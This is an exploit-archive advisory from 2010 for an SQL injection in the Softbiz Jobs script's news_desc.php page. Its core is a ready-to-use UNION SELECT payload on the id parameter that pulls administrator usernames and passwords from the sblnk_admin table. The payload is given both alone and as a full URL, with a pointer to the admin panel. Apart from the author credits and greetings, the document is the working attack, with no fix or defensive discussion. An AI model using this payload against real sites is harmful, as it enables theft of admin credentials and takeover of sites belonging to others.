Softbiz Jobs ( news_desc) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Softbiz Jobs ( news_desc) SQL Injection Vulnerability
# Published : 2010-02-22
# Author : Baybora
# Previous Title : bispage Bypass Vulnerability
# Next Title : Ac4p.com Gallery v1.0 Multiple Vulnerabilities

Softbiz Jobs ( news_desc) SQL Injection Vulnerability

########################### 
Author    : Baybora

Homepage  : http://www.1923turk.com 

Blog      : http://baybora.wordpress.com/

Script    : softbizscripts

Download  : http://www.softbizscripts.com/

########################### 
  
Exploat  :news_desc.php?id=SQL 
   

-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--
  
  
  
http://server/news_desc.php?id=-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--
  
 
http://xxxx/admin
 
  
##############################################################  
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO  
##############################################################